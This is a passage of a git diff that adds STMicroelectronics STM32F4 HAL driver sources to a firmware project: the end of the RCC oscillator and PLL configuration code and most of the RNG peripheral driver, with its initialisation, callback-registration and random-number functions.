to Backup Domain of necessary */ + if(__HAL_RCC_PWR_IS_CLK_DISABLED()) + { + __HAL_RCC_PWR_CLK_ENABLE(); + pwrclkchanged = SET; + } + + if(HAL_IS_BIT_CLR(PWR->CR, PWR_CR_DBP)) + { + /* Enable write access to Backup domain */ + SET_BIT(PWR->CR, PWR_CR_DBP); + + /* Wait for Backup domain Write protection disable */ + tickstart = HAL_GetTick(); + + while(HAL_IS_BIT_CLR(PWR->CR, PWR_CR_DBP)) + { + if((HAL_GetTick() - tickstart) > RCC_DBP_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + /* Set the new LSE configuration -----------------------------------------*/ + __HAL_RCC_LSE_CONFIG(RCC_OscInitStruct->LSEState); + /* Check the LSE State */ + if((RCC_OscInitStruct->LSEState) != RCC_LSE_OFF) + { + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till LSE is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_LSERDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > RCC_LSE_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + + /* Restore clock configuration if changed */ + if(pwrclkchanged == SET) + { + __HAL_RCC_PWR_CLK_DISABLE(); + } + } + /*-------------------------------- PLL Configuration -----------------------*/ + /* Check the parameters */ + assert_param(IS_RCC_PLL(RCC_OscInitStruct->PLL.PLLState)); + if ((RCC_OscInitStruct->PLL.PLLState) != RCC_PLL_NONE) + { + /* Check if the PLL is used as system clock or not */ + if(__HAL_RCC_GET_SYSCLK_SOURCE() != RCC_CFGR_SWS_PLL) + { + if((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_ON) + { + /* Check the parameters */ + assert_param(IS_RCC_PLLSOURCE(RCC_OscInitStruct->PLL.PLLSource)); + assert_param(IS_RCC_PLLM_VALUE(RCC_OscInitStruct->PLL.PLLM)); + assert_param(IS_RCC_PLLN_VALUE(RCC_OscInitStruct->PLL.PLLN)); + assert_param(IS_RCC_PLLP_VALUE(RCC_OscInitStruct->PLL.PLLP)); + assert_param(IS_RCC_PLLQ_VALUE(RCC_OscInitStruct->PLL.PLLQ)); + assert_param(IS_RCC_PLLR_VALUE(RCC_OscInitStruct->PLL.PLLR)); + + /* Disable the main PLL. */ + __HAL_RCC_PLL_DISABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + + /* Configure the main PLL clock source, multiplication and division factors. */ + WRITE_REG(RCC->PLLCFGR, (RCC_OscInitStruct->PLL.PLLSource | \ + RCC_OscInitStruct->PLL.PLLM | \ + (RCC_OscInitStruct->PLL.PLLN << RCC_PLLCFGR_PLLN_Pos) | \ + (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U) << RCC_PLLCFGR_PLLP_Pos) | \ + (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos) | \ + (RCC_OscInitStruct->PLL.PLLR << RCC_PLLCFGR_PLLR_Pos))); + /* Enable the main PLL. */ + __HAL_RCC_PLL_ENABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) == RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + else + { + /* Disable the main PLL. */ + __HAL_RCC_PLL_DISABLE(); + + /* Get Start Tick*/ + tickstart = HAL_GetTick(); + + /* Wait till PLL is ready */ + while(__HAL_RCC_GET_FLAG(RCC_FLAG_PLLRDY) != RESET) + { + if((HAL_GetTick() - tickstart ) > PLL_TIMEOUT_VALUE) + { + return HAL_TIMEOUT; + } + } + } + } + else + { + /* Check if there is a request to disable the PLL used as System clock source */ + if((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) + { + return HAL_ERROR; + } + else + { + /* Do not return HAL_ERROR if request repeats the current configuration */ + pll_config = RCC->PLLCFGR; +#if defined (RCC_PLLCFGR_PLLR) + if (((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLSRC) != RCC_OscInitStruct->PLL.PLLSource) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLM) != (RCC_OscInitStruct->PLL.PLLM) << RCC_PLLCFGR_PLLM_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLN) != (RCC_OscInitStruct->PLL.PLLN) << RCC_PLLCFGR_PLLN_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLP) != (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U)) << RCC_PLLCFGR_PLLP_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLQ) != (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos)) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLR) != (RCC_OscInitStruct->PLL.PLLR << RCC_PLLCFGR_PLLR_Pos))) +#else + if (((RCC_OscInitStruct->PLL.PLLState) == RCC_PLL_OFF) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLSRC) != RCC_OscInitStruct->PLL.PLLSource) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLM) != (RCC_OscInitStruct->PLL.PLLM) << RCC_PLLCFGR_PLLM_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLN) != (RCC_OscInitStruct->PLL.PLLN) << RCC_PLLCFGR_PLLN_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLP) != (((RCC_OscInitStruct->PLL.PLLP >> 1U) - 1U)) << RCC_PLLCFGR_PLLP_Pos) || + (READ_BIT(pll_config, RCC_PLLCFGR_PLLQ) != (RCC_OscInitStruct->PLL.PLLQ << RCC_PLLCFGR_PLLQ_Pos))) +#endif + { + return HAL_ERROR; + } + } + } + } + return HAL_OK; +} + +/** + * @brief Configures the RCC_OscInitStruct according to the internal + * RCC configuration registers. + * @param RCC_OscInitStruct pointer to an RCC_OscInitTypeDef structure that will be configured. + * + * @note This function is only available in case of STM32F410xx/STM32F446xx/STM32F469xx/STM32F479xx/STM32F412Zx/STM32F412Vx/STM32F412Rx/STM32F412Cx devices. + * @note This function add the PLL/PLLR factor management + * @retval None + */ +void HAL_RCC_GetOscConfig(RCC_OscInitTypeDef *RCC_OscInitStruct) +{ + /* Set all possible values for the Oscillator type parameter ---------------*/ + RCC_OscInitStruct->OscillatorType = RCC_OSCILLATORTYPE_HSE | RCC_OSCILLATORTYPE_HSI | RCC_OSCILLATORTYPE_LSE | RCC_OSCILLATORTYPE_LSI; + + /* Get the HSE configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_HSEBYP) == RCC_CR_HSEBYP) + { + RCC_OscInitStruct->HSEState = RCC_HSE_BYPASS; + } + else if((RCC->CR &RCC_CR_HSEON) == RCC_CR_HSEON) + { + RCC_OscInitStruct->HSEState = RCC_HSE_ON; + } + else + { + RCC_OscInitStruct->HSEState = RCC_HSE_OFF; + } + + /* Get the HSI configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_HSION) == RCC_CR_HSION) + { + RCC_OscInitStruct->HSIState = RCC_HSI_ON; + } + else + { + RCC_OscInitStruct->HSIState = RCC_HSI_OFF; + } + + RCC_OscInitStruct->HSICalibrationValue = (uint32_t)((RCC->CR &RCC_CR_HSITRIM) >> RCC_CR_HSITRIM_Pos); + + /* Get the LSE configuration -----------------------------------------------*/ + if((RCC->BDCR &RCC_BDCR_LSEBYP) == RCC_BDCR_LSEBYP) + { + RCC_OscInitStruct->LSEState = RCC_LSE_BYPASS; + } + else if((RCC->BDCR &RCC_BDCR_LSEON) == RCC_BDCR_LSEON) + { + RCC_OscInitStruct->LSEState = RCC_LSE_ON; + } + else + { + RCC_OscInitStruct->LSEState = RCC_LSE_OFF; + } + + /* Get the LSI configuration -----------------------------------------------*/ + if((RCC->CSR &RCC_CSR_LSION) == RCC_CSR_LSION) + { + RCC_OscInitStruct->LSIState = RCC_LSI_ON; + } + else + { + RCC_OscInitStruct->LSIState = RCC_LSI_OFF; + } + + /* Get the PLL configuration -----------------------------------------------*/ + if((RCC->CR &RCC_CR_PLLON) == RCC_CR_PLLON) + { + RCC_OscInitStruct->PLL.PLLState = RCC_PLL_ON; + } + else + { + RCC_OscInitStruct->PLL.PLLState = RCC_PLL_OFF; + } + RCC_OscInitStruct->PLL.PLLSource = (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLSRC); + RCC_OscInitStruct->PLL.PLLM = (uint32_t)(RCC->PLLCFGR & RCC_PLLCFGR_PLLM); + RCC_OscInitStruct->PLL.PLLN = (uint32_t)((RCC->PLLCFGR & RCC_PLLCFGR_PLLN) >> RCC_PLLCFGR_PLLN_Pos); + RCC_OscInitStruct->PLL.PLLP = (uint32_t)((((RCC->PLLCFGR & RCC_PLLCFGR_PLLP) + RCC_PLLCFGR_PLLP_0) << 1U) >> RCC_PLLCFGR_PLLP_Pos); + RCC_OscInitStruct->PLL.PLLQ = (uint32_t)((RCC->PLLCFGR & RCC_PLLCFGR_PLLQ) >> RCC_PLLCFGR_PLLQ_Pos); + RCC_OscInitStruct->PLL.PLLR = (uint32_t)((RCC->PLLCFGR & RCC_PLLCFGR_PLLR) >> RCC_PLLCFGR_PLLR_Pos); +} +#endif /* STM32F410xx || STM32F446xx || STM32F469xx || STM32F479xx || STM32F412Zx || STM32F412Vx || STM32F412Rx || STM32F412Cx || STM32F413xx || STM32F423xx */ + +#endif /* HAL_RCC_MODULE_ENABLED */ +/** + * @} + */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rng.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rng.c new file mode 100644 index 000000000..a9b233837 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_rng.c @@ -0,0 +1,868 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_rng.c + * @author MCD Application Team + * @brief RNG HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Random Number Generator (RNG) peripheral: + * + Initialization and configuration functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + The RNG HAL driver can be used as follows: + + (#) Enable the RNG controller clock using __HAL_RCC_RNG_CLK_ENABLE() macro + in HAL_RNG_MspInit(). + (#) Activate the RNG peripheral using HAL_RNG_Init() function. + (#) Wait until the 32 bit Random Number Generator contains a valid + random data using (polling/interrupt) mode. + (#) Get the 32 bit random number using HAL_RNG_GenerateRandomNumber() function. + + ##### Callback registration ##### + ================================== + + [..] + The compilation define USE_HAL_RNG_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + + [..] + Use Function HAL_RNG_RegisterCallback() to register a user callback. + Function HAL_RNG_RegisterCallback() allows to register following callbacks: + (+) ErrorCallback : RNG Error Callback. + (+) MspInitCallback : RNG MspInit. + (+) MspDeInitCallback : RNG MspDeInit. + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + [..] + Use function HAL_RNG_UnRegisterCallback() to reset a callback to the default + weak (surcharged) function. + HAL_RNG_UnRegisterCallback() takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) ErrorCallback : RNG Error Callback. + (+) MspInitCallback : RNG MspInit. + (+) MspDeInitCallback : RNG MspDeInit. + + [..] + For specific callback ReadyDataCallback, use dedicated register callbacks: + respectively HAL_RNG_RegisterReadyDataCallback() , HAL_RNG_UnRegisterReadyDataCallback(). + + [..] + By default, after the HAL_RNG_Init() and when the state is HAL_RNG_STATE_RESET + all callbacks are set to the corresponding weak (surcharged) functions: + example HAL_RNG_ErrorCallback(). + Exception done for MspInit and MspDeInit functions that are respectively + reset to the legacy weak (surcharged) functions in the HAL_RNG_Init() + and HAL_RNG_DeInit() only when these callbacks are null (not registered beforehand). + If not, MspInit or MspDeInit are not null, the HAL_RNG_Init() and HAL_RNG_DeInit() + keep and use the user MspInit/MspDeInit callbacks (registered beforehand). + + [..] + Callbacks can be registered/unregistered in HAL_RNG_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_RNG_STATE_READY or HAL_RNG_STATE_RESET state, thus registered (user) + MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using HAL_RNG_RegisterCallback() before calling HAL_RNG_DeInit() + or HAL_RNG_Init() function. + + [..] + When The compilation define USE_HAL_RNG_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available + and weak (surcharged) callbacks are used. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#if defined (RNG) + +/** @addtogroup RNG + * @brief RNG HAL module driver. + * @{ + */ + +#ifdef HAL_RNG_MODULE_ENABLED + +/* Private types -------------------------------------------------------------*/ +/* Private defines -----------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @defgroup RNG_Private_Constants RNG Private Constants + * @{ + */ +#define RNG_TIMEOUT_VALUE 2U +/** + * @} + */ +/* Private macros ------------------------------------------------------------*/ +/* Private functions prototypes ----------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +/* Exported functions --------------------------------------------------------*/ + +/** @addtogroup RNG_Exported_Functions + * @{ + */ + +/** @addtogroup RNG_Exported_Functions_Group1 + * @brief Initialization and configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and configuration functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize the RNG according to the specified parameters + in the RNG_InitTypeDef and create the associated handle + (+) DeInitialize the RNG peripheral + (+) Initialize the RNG MSP + (+) DeInitialize RNG MSP + +@endverbatim + * @{ + */ + +/** + * @brief Initializes the RNG peripheral and creates the associated handle. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_Init(RNG_HandleTypeDef *hrng) +{ + /* Check the RNG handle allocation */ + if (hrng == NULL) + { + return HAL_ERROR; + } + /* Check the parameters */ + assert_param(IS_RNG_ALL_INSTANCE(hrng->Instance)); + +#if (USE_HAL_RNG_REGISTER_CALLBACKS == 1) + if (hrng->State == HAL_RNG_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hrng->Lock = HAL_UNLOCKED; + + hrng->ReadyDataCallback = HAL_RNG_ReadyDataCallback; /* Legacy weak ReadyDataCallback */ + hrng->ErrorCallback = HAL_RNG_ErrorCallback; /* Legacy weak ErrorCallback */ + + if (hrng->MspInitCallback == NULL) + { + hrng->MspInitCallback = HAL_RNG_MspInit; /* Legacy weak MspInit */ + } + + /* Init the low level hardware */ + hrng->MspInitCallback(hrng); + } +#else + if (hrng->State == HAL_RNG_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hrng->Lock = HAL_UNLOCKED; + + /* Init the low level hardware */ + HAL_RNG_MspInit(hrng); + } +#endif /* USE_HAL_RNG_REGISTER_CALLBACKS */ + + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_BUSY; + + + /* Enable the RNG Peripheral */ + __HAL_RNG_ENABLE(hrng); + + /* Initialize the RNG state */ + hrng->State = HAL_RNG_STATE_READY; + + /* Initialise the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_NONE; + + /* Return function status */ + return HAL_OK; +} + +/** + * @brief DeInitializes the RNG peripheral. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_DeInit(RNG_HandleTypeDef *hrng) +{ + /* Check the RNG handle allocation */ + if (hrng == NULL) + { + return HAL_ERROR; + } + + /* Disable the RNG Peripheral */ + CLEAR_BIT(hrng->Instance->CR, RNG_CR_IE | RNG_CR_RNGEN); + + /* Clear RNG interrupt status flags */ + CLEAR_BIT(hrng->Instance->SR, RNG_SR_CEIS | RNG_SR_SEIS); + +#if (USE_HAL_RNG_REGISTER_CALLBACKS == 1) + if (hrng->MspDeInitCallback == NULL) + { + hrng->MspDeInitCallback = HAL_RNG_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware */ + hrng->MspDeInitCallback(hrng); +#else + /* DeInit the low level hardware */ + HAL_RNG_MspDeInit(hrng); +#endif /* USE_HAL_RNG_REGISTER_CALLBACKS */ + + /* Update the RNG state */ + hrng->State = HAL_RNG_STATE_RESET; + + /* Initialise the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_NONE; + + /* Release Lock */ + __HAL_UNLOCK(hrng); + + /* Return the function status */ + return HAL_OK; +} + +/** + * @brief Initializes the RNG MSP. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval None + */ +__weak void HAL_RNG_MspInit(RNG_HandleTypeDef *hrng) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrng); + /* NOTE : This function should not be modified. When the callback is needed, + function HAL_RNG_MspInit must be implemented in the user file. + */ +} + +/** + * @brief DeInitializes the RNG MSP. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval None + */ +__weak void HAL_RNG_MspDeInit(RNG_HandleTypeDef *hrng) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hrng); + /* NOTE : This function should not be modified. When the callback is needed, + function HAL_RNG_MspDeInit must be implemented in the user file. + */ +} + +#if (USE_HAL_RNG_REGISTER_CALLBACKS == 1) +/** + * @brief Register a User RNG Callback + * To be used instead of the weak predefined callback + * @param hrng RNG handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_RNG_ERROR_CB_ID Error callback ID + * @arg @ref HAL_RNG_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_RNG_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_RegisterCallback(RNG_HandleTypeDef *hrng, HAL_RNG_CallbackIDTypeDef CallbackID, + pRNG_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hrng); + + if (HAL_RNG_STATE_READY == hrng->State) + { + switch (CallbackID) + { + case HAL_RNG_ERROR_CB_ID : + hrng->ErrorCallback = pCallback; + break; + + case HAL_RNG_MSPINIT_CB_ID : + hrng->MspInitCallback = pCallback; + break; + + case HAL_RNG_MSPDEINIT_CB_ID : + hrng->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_RNG_STATE_RESET == hrng->State) + { + switch (CallbackID) + { + case HAL_RNG_MSPINIT_CB_ID : + hrng->MspInitCallback = pCallback; + break; + + case HAL_RNG_MSPDEINIT_CB_ID : + hrng->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrng); + return status; +} + +/** + * @brief Unregister an RNG Callback + * RNG callabck is redirected to the weak predefined callback + * @param hrng RNG handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_RNG_ERROR_CB_ID Error callback ID + * @arg @ref HAL_RNG_MSPINIT_CB_ID MspInit callback ID + * @arg @ref HAL_RNG_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_UnRegisterCallback(RNG_HandleTypeDef *hrng, HAL_RNG_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hrng); + + if (HAL_RNG_STATE_READY == hrng->State) + { + switch (CallbackID) + { + case HAL_RNG_ERROR_CB_ID : + hrng->ErrorCallback = HAL_RNG_ErrorCallback; /* Legacy weak ErrorCallback */ + break; + + case HAL_RNG_MSPINIT_CB_ID : + hrng->MspInitCallback = HAL_RNG_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_RNG_MSPDEINIT_CB_ID : + hrng->MspDeInitCallback = HAL_RNG_MspDeInit; /* Legacy weak MspDeInit */ + break; + + default : + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (HAL_RNG_STATE_RESET == hrng->State) + { + switch (CallbackID) + { + case HAL_RNG_MSPINIT_CB_ID : + hrng->MspInitCallback = HAL_RNG_MspInit; /* Legacy weak MspInit */ + break; + + case HAL_RNG_MSPDEINIT_CB_ID : + hrng->MspDeInitCallback = HAL_RNG_MspDeInit; /* Legacy weak MspInit */ + break; + + default : + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrng); + return status; +} + +/** + * @brief Register Data Ready RNG Callback + * To be used instead of the weak HAL_RNG_ReadyDataCallback() predefined callback + * @param hrng RNG handle + * @param pCallback pointer to the Data Ready Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_RegisterReadyDataCallback(RNG_HandleTypeDef *hrng, pRNG_ReadyDataCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hrng); + + if (HAL_RNG_STATE_READY == hrng->State) + { + hrng->ReadyDataCallback = pCallback; + } + else + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrng); + return status; +} + +/** + * @brief UnRegister the Data Ready RNG Callback + * Data Ready RNG Callback is redirected to the weak HAL_RNG_ReadyDataCallback() predefined callback + * @param hrng RNG handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_UnRegisterReadyDataCallback(RNG_HandleTypeDef *hrng) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hrng); + + if (HAL_RNG_STATE_READY == hrng->State) + { + hrng->ReadyDataCallback = HAL_RNG_ReadyDataCallback; /* Legacy weak ReadyDataCallback */ + } + else + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hrng); + return status; +} + +#endif /* USE_HAL_RNG_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @addtogroup RNG_Exported_Functions_Group2 + * @brief Peripheral Control functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Get the 32 bit Random number + (+) Get the 32 bit Random number with interrupt enabled + (+) Handle RNG interrupt request + +@endverbatim + * @{ + */ + +/** + * @brief Generates a 32-bit random number. + * @note Each time the random number data is read the RNG_FLAG_DRDY flag + * is automatically cleared. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @param random32bit pointer to generated random number variable if successful. + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_RNG_GenerateRandomNumber(RNG_HandleTypeDef *hrng, uint32_t *random32bit) +{ + uint32_t tickstart; + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(hrng); + + /* Check RNG peripheral state */ + if (hrng->State == HAL_RNG_STATE_READY) + { + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_BUSY; + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Check if data register contains valid random data */ + while (__HAL_RNG_GET_FLAG(hrng, RNG_FLAG_DRDY) == RESET) + { + if ((HAL_GetTick() - tickstart) > RNG_TIMEOUT_VALUE) + { + /* New check to avoid false timeout detection in case of preemption */ + if (__HAL_RNG_GET_FLAG(hrng, RNG_FLAG_DRDY) == RESET) + { + hrng->State = HAL_RNG_STATE_READY; + hrng->ErrorCode = HAL_RNG_ERROR_TIMEOUT; + /* Process Unlocked */ + __HAL_UNLOCK(hrng); + return HAL_ERROR; + } + } + } + + /* Get a 32bit Random number */ + hrng->RandomNumber = hrng->Instance->DR; + *random32bit = hrng->RandomNumber; + + hrng->State = HAL_RNG_STATE_READY; + } + else + { + hrng->ErrorCode = HAL_RNG_ERROR_BUSY; + status = HAL_ERROR; + } + + /* Process Unlocked */ + __HAL_UNLOCK(hrng); + + return status; +} + +/** + * @brief Generates a 32-bit random number in interrupt mode. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_RNG_GenerateRandomNumber_IT(RNG_HandleTypeDef *hrng) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process Locked */ + __HAL_LOCK(hrng); + + /* Check RNG peripheral state */ + if (hrng->State == HAL_RNG_STATE_READY) + { + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_BUSY; + + /* Enable the RNG Interrupts: Data Ready, Clock error, Seed error */ + __HAL_RNG_ENABLE_IT(hrng); + } + else + { + /* Process Unlocked */ + __HAL_UNLOCK(hrng); + + hrng->ErrorCode = HAL_RNG_ERROR_BUSY; + status = HAL_ERROR; + } + + return status; +} + +/** + * @brief Returns generated random number in polling mode (Obsolete) + * Use HAL_RNG_GenerateRandomNumber() API instead. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval Random value + */ +uint32_t HAL_RNG_GetRandomNumber(RNG_HandleTypeDef *hrng) +{ + if (HAL_RNG_GenerateRandomNumber(hrng, &(hrng->RandomNumber)) == HAL_OK) + { + return hrng->RandomNumber; + } + else + { + return 0U; + } +} + +/** + * @brief Returns a 32-bit random number with interrupt enabled (Obsolete), + * Use HAL_RNG_GenerateRandomNumber_IT() API instead. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval 32-bit random number + */ +uint32_t HAL_RNG_GetRandomNumber_IT(RNG_HandleTypeDef *hrng) +{ + uint32_t random32bit = 0U; + + /* Process locked */ + __HAL_LOCK(hrng); + + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_BUSY; + + /* Get a 32bit Random number */ + random32bit = hrng->Instance->DR; + + /* Enable the RNG Interrupts: Data Ready, Clock error, Seed error */ + __HAL_RNG_ENABLE_IT(hrng); + + /* Return the 32 bit random number */ + return random32bit; +} + +/** + * @brief Handles RNG interrupt request. + * @note In the case of a clock error, the RNG is no more able to generate + * random numbers because the PLL48CLK clock is not correct. User has + * to check that the clock controller is correctly configured to provide + * the RNG clock and clear the CEIS bit using __HAL_RNG_CLEAR_IT(). + * The clock error has no impact on the previously generated + * random numbers, and the RNG_DR register contents can be used. + * @note In the case of a seed error, the generation of random numbers is + * interrupted as long as the SECS bit is '1'. If a number is + * available in the RNG_DR register, it must not be used because it may + * not have enough entropy. In this case, it is recommended to clear the + * SEIS bit using __HAL_RNG_CLEAR_IT(), then disable and enable + * the RNG peripheral to reinitialize and restart the RNG. + * @note User-written HAL_RNG_ErrorCallback() API is called once whether SEIS + * or CEIS are set. + * @param hrng pointer to a RNG_HandleTypeDef structure that contains + * the configuration information for RNG. + * @retval None + + */ +void HAL_RNG_IRQHandler(RNG_HandleTypeDef *hrng) +{ + uint32_t rngclockerror = 0U; + + /* RNG clock error interrupt occurred */ + if (__HAL_RNG_GET_IT(hrng, RNG_IT_CEI) != RESET) + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_CLOCK; + rngclockerror = 1U; + } + else if (__HAL_RNG_GET_IT(hrng, RNG_IT_SEI) != RESET) + { + /* Update the error code */ + hrng->ErrorCode = HAL_RNG_ERROR_SEED; + rngclockerror = 1U; + } + else + { + /* Nothing to do */ + } + + if (rngclockerror == 1U) + { + /* Change RNG peripheral state */ + hrng->State = HAL_RNG_STATE_ERROR; + +#if 